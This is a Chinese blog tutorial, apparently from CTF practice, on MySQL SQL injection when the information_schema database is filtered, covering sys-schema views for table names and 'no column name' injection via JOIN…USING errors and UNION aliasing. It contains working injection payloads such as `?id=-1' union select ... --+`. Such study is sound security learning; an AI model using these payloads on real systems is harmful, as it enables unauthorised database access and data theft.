information_schema过滤与无列名注入

最新推荐文章于 2024-03-03 00:07:52 发布
最新推荐文章于 2024-03-03 00:07:52 发布
阅读量2.4k 收藏 10
点赞数 6
分类专栏: Web安全学习篇 文章标签: mysql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49656607/article/details/119988304
版权

前言

在手工SQL注入时,我们常常会想着利用 information_schema库 来进行爆数据库名、表名、字段名,但如果 information_schema库 被禁用了怎么办?

正好遇到了这样一道题,所以来记录一下学习

简单介绍一下information_schema库

mysql中的information_schma这个库是干嘛的,在sql注入中它的作用是什么,那么有没有可以替代这个库的方法呢?

简单来说,information_schma库就像是mysql的信息数据库,它保存着mysql服务器所维护的所有其他数据库的信息,当然也就包括了数据库名、表名、列名。

在注入时,infromation_schema库的作用就是获取table_schema、table_name、column_name这些数据库内的信息。

MySQL5.7的新特性

在mysql在5.7版本中新增了sys.schema,基础数据来自于 performance_chema 和 information_schema 两个库,本身数据库不存储数据

所以就有了几个可以代替infromation_schema注入是的作用

sys.schema_auto_increment_columns 对表自增ID的监控

在这里插入图片描述

查询表的统计信息,其中还包括Innodb缓冲池统计信息,默认情况下按照增删改查操作的总表I/O延迟时间(执行时间)降序排序

sys.schema_table_statistics_with_buffer
sys.x$schema_table_statistics_with_buffer

在这里插入图片描述
在这里插入图片描述
但是 sys.schema_auto_increment_columns这个库有些局限性,一般要超级管理员才可以访问sys。

类似可以利用的表还有:
mysql.innodb_table_statsmysql.innodb_table_index同样存放有库名表名

在这里插入图片描述

无列名注入

上面的方法确实可以读取到数据库名和表名,但是列名呢?并没有找到可以读取列名的表

利用join-using注列名

通过系统关键词join可建立两个表之间的内连接。通过对想要查询列名所在的表与其自身内连接,会由于冗余的原因(相同列名存在),而发生错误。并且报错信息会存在重复的列名,可以使用 USING 表达式声明内连接(INNER JOIN)条件来避免报错

爆表名
?id=-1' union select 1,2,group_concat(table_name)from sys.schema_auto_increment_columns where table_schema=database()--+
?id=-1' union select 1,2,group_concat(table_name)from sys.schema_table_statistics_with_buffer where table_schema=database()--+

爆字段名
获取第一列的字段名及后面每一列字段名
?id=-1' union select*from (select * from users as a join users as b)as c--+
?id=-1' union select*from (select * from users as a join users b using(id,username))c--+
?id=-1' union select*from (select * from users as a join users b using(id,username,password))c--+

数据库中as作用是起别名,as是可以省略的,为了增加可读性,建议不省略。

在这里插入图片描述

正常查询

在这里插入图片描述

select 1,2,3,4,5 union select * from users;
无列名注入关键 就是要猜测表里有多少个列,要一一对应上,上面例子是有5个列
1,2,3,4,5 的作用就是对列起别名,替换为后面无列名注入做准备在这里插入图片描述

接着就可以使用数字来对应列进行查询,如3对应了表里面的pass
select `3` from (select 1,2,3,4,5 union select * from users)as a;
就相当于select pass from (select 1,2,3,4,5 union select * from users)as a;
SQL 中反引号是可以代表数据库名和列名的
(select 1,2,3,4,5 union select * from users)as a 把括号里的查询数据重命名一张新的表 a,在从中查询
在这里插入图片描述

当反引号被禁用时,就可以使用起别名的方法来代替
select b from (select 1,2, 3 as b ,4,5 union select * from users)as a;
在注入时同时查询多个列
select group_concat(b,c) from (select 1,2, 3 as b , 4 as c ,5 union select * from users)as a;
在这里插入图片描述

其他爆表名的方法还可以延伸,可以参考这个

https://osandamalith.com/2020/01/27/alternatives-to-extract-tables-and-columns-from-mysql-and-mariadb/

paidx0
关注
  • 6
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
BUUCTF:[GYCTF2020]Ezsqli --过滤information_schem ------ 无列明注入过滤了union 使用ascii偏移来做
Zero_Adam的博客
03-15 1356
一、自己做: 直截了当的sql注入,先用fuzz字典跑一下: information_schema.table等被过滤了, 而且union 也被过了, 尝试了 || 和&& 等没有过滤,并且strsub,limit等都没有过滤,初步判断盲注应该时可以的。 但是 information_chema等被过滤了,和 列都查不出来, 二、学到的&&不足: 当information_schema等被过滤的时候,能够查出数据库的名字,但是明不知道,这时可以用这个来sys.schem
WEB—无列名注入过滤information_schema
sGanYu
11-09 2718
一开始由于注册admin的时候,告知用户已被注册,以为需要爆破admin密码,失败后尝试万能密码,发现也不行。。。注册新用户后又对广告的xss研究半天,虽然怀疑过SQL,后来没想到真的是SQL注入 知识点 无列名注入 过滤information_schema 随便注册一个账户登录,进去后可以发布广告【千万不要写入一个xss,弹来弹去,盲猜你们会尝试】 发布一个广告名为:1',内容随意 点击广告详情,弹出关键报错信息,数据库为MariaDB 继续注入,发布一个广告名为:.
MySQL和MariaDB提取和列的方法
火柴人的博客
03-13 555
Sys 这些实验在MySQL 5.7.9 mysql> SELECT object_name FROM `sys`.`x$innodb_buffer_stats_by_table` WHERE object_schema = DATABASE(); +-------------+ | object_name | +-------------+ | emails | | flag ...
深入浅出带你学习无列名注入
郊眠寺
02-16 1017
今天给大家带来了无列名注入的知识点不知道大家学会了没有,简单来说无列名注入还是挺考察思维的需要我们构造查询的payload并写出脚本,有兴趣的小伙伴不妨自己去试一下,喜欢本文希望可以一键三连支持一下。最近找到一个VUE的文档,它将VUE的各个知识点进行了总结,整理成了《Vue 开发必须知道的36个技巧》。内容比较详实,对各个知识点的讲解也十分到位。
SQL无列名注入方法总结(基于union, join)
DawdleD的博客
05-25 2723
本文要点 通过对基于join的无列名注入攻击的研究,本文提出了一种场景以及对应的攻击方法,该攻击方法不需要使用using关键字。 本文整理了相关的博文,将在篇末展示(由于该篇博文是原创博文所以我不会把它们的内容照搬过来,请自行取阅) 一种基于join的无列名注入-1 select Host,User,Select_priv from user where User="root" 在上述场景中用户可以控制的输入是字符串"root",假设的攻击场景中我们可以突破双引号闭合并进行任意sql注入。但是我们
SQL注入之 无列名注入 原理详解
Jay17的博客
09-17 634
SQL注入之 无列名注入 原理详解
MySQL在不知道列名情况下的注入详解
12-16
然而,如果information_schema库被WAF(Web Application Firewall)过滤,我们就需要采取其他策略。 1. **数字对应列查询**: 在无法直接使用列名的情况下,可以通过数字索引来访问列。例如,`select 2`会返回第二...
web-报错注入-皮卡丘靶场
07-15
防止报错注入的关键在于对用户输入进行严格的验证和过滤,避免在错误消息中泄露敏感信息,以及使用预编译的SQL语句(如参数化查询或存储过程),以减少SQL注入的风险。在进行渗透测试或安全训练时,皮卡丘靶场提供了...
php手工注入.doc
11-29
由于非`root`权限,攻击者无法直接访问所有信息,但他们注意到MySQL 5.0及以上版本都包含一个名为`information_schema`的虚拟库,其中存储了所有数据库的相关信息。于是,他们尝试利用这个库来列举出数据库中的名...
SQL注入之无列名注入
weixin_46330722的博客
11-10 4076
列名注入概念原理利用 概念 在我们进行sql注入的时候,有时候information_schema这个库可能会因为过滤而无法调用,这是我们就不能通过这个库来查出名和列名。这时我们可以通过两种方法来查出名: InnoDb引擎 从MYSQL5.5.8开始,InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_table_stats两张,这两张中都存储了数据库和其数据的信息,但是没有存储列名。 sys数据库 在5.7以上
列名&位或注入随记
Aiwin的博客
02-07 854
列名&位或注入随记
-------已搬运------SQL注入过滤 思路 payload 万能密码
Zero_Adam的博客
04-28 1577
目录:一、过滤关键词:1. 过滤 `=` 可用 `like`,`regexp`,`in`来代替:2. 过滤`ascii`,不能用bool盲注了。可用`ord`来代替:3. `,`逗号被过滤了:1. `substr(***,1,1)` 用这个来代替:`substr(***from({})for(1))`2.`limit 0,1` 用这个来代替:`limit 1 offset {}`二、一些小trick1. 关于bool盲注的正确与否三、一些payload:1. 过滤了 空格,但是可以联合查询的bool注
Bypass information_schema
mi900709的博客
12-02 651
Bypass information_schema 前言 聊一聊mysql在被waf禁掉了information_schema库后还能有哪些利用思路,这个想法是前一段时间想到的,这次趁着安全客活动就在这里记录一下吧~ 实验环境 windows 2008 r2 phpstudy (mysql 5.7) 某waf(原因是该waf可以设置非法访问information_schema数据库) 前置任务 进行bypass之前先了解一下mysql中的information_schma这个库是干嘛的,在SQ
sql注入information_schema代替,无列名注入之[SWPU2019]Web11
qq_58970968的博客
08-10 899
的时候,有时候information_schema这个库可能会因为过滤而无法调用,这时我们就不能通过这个库来查出名和列名。但是上述两种方法都只能查出名,无法查到列名,这时我们就要用到无列名注入了。无列名注入,顾名思义,就是不需要列名就能注出数据的注入。但是mysql.innodb_table_stats只查到名,所以不知道列名information_schema可以查到所有的数据库和名和列名;当or 被过滤时不能使用information_schema;这道题过滤了空格,用/**/绕过;...
SQL注入绕过正则及无列名注入
热门推荐
钟言的博客
12-19 1万+
本篇为SQL注入绕过正则达式及无列名注入,详细内容包含了select\bNslS]bfrom正则 科学计数法绕过 过滤information 四、无列名注入 1、利用 join-using 注列名 2、无列名查询 五、报错注入7大常用函数 1.ST LatFromGeoHash() (mysql>=5.7.x)payload 2.ST LongFromGeoHash (mysql>=5.7.x) payload 3.GTID (MySQL >= 5.6.X - 显错
mysql注入绕过information_schema过滤
b1ackc4t的博客
10-19 5725
1.利用mysql5.7新增的sys.schema_auto_increment_columns 这是sys数据库下的一个视图,基础数据来自与information_schema,他的作用是对的自增ID进行监控,也就是说,如果某张存在自增ID,就可以通过该视图来获取其名和所在数据库名 以下为该视图的所有列 2.sys.schema_table_statistics_with_buffer 这是sys数据库下的视图,里面存储着所有数据库所有的统计信息 ...
SQL无列名注入
最新发布
qq_66013948的博客
03-03 1127
​ 二次注入就是指以储存(数据库、文件)的用户输入被读取后再次进入到SQL查询语句中导致注入
SQL注入——字符型注入和无列名注入实例(超详细,小白也能学得会)
m0_69151365的博客
01-28 1390
在这一关中,我们首先判断了sql注入类型,发现是字符型注入,我们先是利用order by 来确定该中的列数,有了列数我们就可以通过database()函数获取到该网站所在的库,我们在information_schema 库中通过刚才获取的库名作为我们的筛选条件在tables中查询到了该库中的所有,又在columns通过过滤table_name和table_schema两个字段查找出users中的列(字段)信息,到这一步之后我们就直接在users中查找用户和密码,此时注入完成。
mysql 获取 information_schema.columns的列名,作为example的列查询字段
05-30
您可以使用如下 SQL 语句来获取 `information_schema.columns` 中的列名,并将这些列名作为 `example` 查询字段: ``` SELECT GROUP_CONCAT(column_name SEPARATOR ',') FROM information_schema.columns WHERE ...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值